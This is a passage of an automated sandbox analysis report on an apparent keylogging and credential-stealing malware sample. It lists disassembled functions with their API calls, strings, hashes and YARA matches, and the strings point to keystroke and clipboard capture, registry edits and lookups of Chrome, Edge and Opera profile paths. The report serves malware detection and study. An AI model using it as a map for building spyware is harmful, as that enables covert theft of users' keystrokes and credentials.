                                                                                          • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                                                                          • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                                                                          • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                                                                          Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                                          • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                                                                          • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                                          • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                                                                          Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                                          • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                                                                          • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                                          • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                                                                          Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 3919263394-0
                                                                                          • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                                                                          • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                                                                          • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                                                                          • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                                                                          Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                                                            • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                          • String ID:
                                                                                          • API String ID: 1761009282-0
                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                          • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                                                                          Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorHandling__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 3213639722-2276729525
                                                                                          • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                          • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                                                                          • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                          • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                                                                          Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                                                                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                                                                          Strings
                                                                                          • /sort "Visit Time" /stext ", xrefs: 00404092
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                          • String ID: /sort "Visit Time" /stext "
                                                                                          • API String ID: 368326130-1573945896
                                                                                          • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                                                                          • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                                                                          • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                                                                          • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                                                                          Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer__onexit
                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                          • API String ID: 1881088180-3686566968
                                                                                          • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                                                                          • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                                                                          • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                                                                          • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                                                                          Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0044EDF2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 0-711371036
                                                                                          • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                          • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                                                                          • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                          • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                                                                          Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                                                                          • IsWindowVisible.USER32(?), ref: 00415B37
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$TextVisible
                                                                                          • String ID: (%G
                                                                                          • API String ID: 1670992164-3377777310
                                                                                          • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                                                                          • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                                                                          • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                                                                          • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                                                                          Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                                                                          Strings
                                                                                          • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                          • API String ID: 481472006-507513762
                                                                                          • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                                                                          • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                                                                          • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                                                                          • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                                                                          Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                                                                          • ___raise_securityfailure.LIBCMT ref: 00432E76
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                          • String ID: (F
                                                                                          • API String ID: 3761405300-3109638091
                                                                                          • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                                          • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                                                                          • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                                          • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                                                                          Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                                          • API String ID: 481472006-2430845779
                                                                                          • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                                                                          • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                                                                          • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                                                                          • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                                                                          Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: alarm.wav$x(G
                                                                                          • API String ID: 1174141254-2413638199
                                                                                          • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                                                                          • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                                                                          • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                                                                          • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                                                                          Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                            • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • CloseHandle.KERNEL32(?), ref: 00409FFD
                                                                                          • UnhookWindowsHookEx.USER32 ref: 0040A010
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                          • String ID: Online Keylogger Stopped
                                                                                          • API String ID: 1623830855-1496645233
                                                                                          • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                                                                          • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                                                                          • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                                                                                          • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                                                                          Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                          • API String ID: 1174141254-2800177040
                                                                                          • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                                                                          • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                                                                          • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                                                                                          • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                                                                          Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                          • API String ID: 1174141254-4188645398
                                                                                          • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                                                                          • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                                                                          • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                                                                                          • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                                                                          Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                                                          • API String ID: 1174141254-1629609700
                                                                                          • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                                                                                          • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                                                                          • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                                                                                          • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                                                                          Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000011), ref: 0040A597
                                                                                            • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                                                                            • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                            • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                            • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                                                            • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                                                            • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                          • String ID: [AltL]$[AltR]
                                                                                          • API String ID: 3195419117-2658077756
                                                                                          • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                                                                          • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                                                                          • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                                                                          • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                                                                          Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000012), ref: 0040A5F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State
                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                          • API String ID: 1649606143-2446555240
                                                                                          • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                                                                          • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                                                                          • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                                                                          • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                                                                          Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteOpenValue
                                                                                          • String ID: 6h@
                                                                                          • API String ID: 2654517830-73392143
                                                                                          • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                                          • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                                                                          • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                                          • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                                                                          Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                                                                          • GetLastError.KERNEL32 ref: 0043B4E9
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1717984340-0
                                                                                          • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                                                                          • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                                                                          • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                                                                          • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                                                                          Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                                                                          • SetLastError.KERNEL32(0000007F), ref: 004106DF
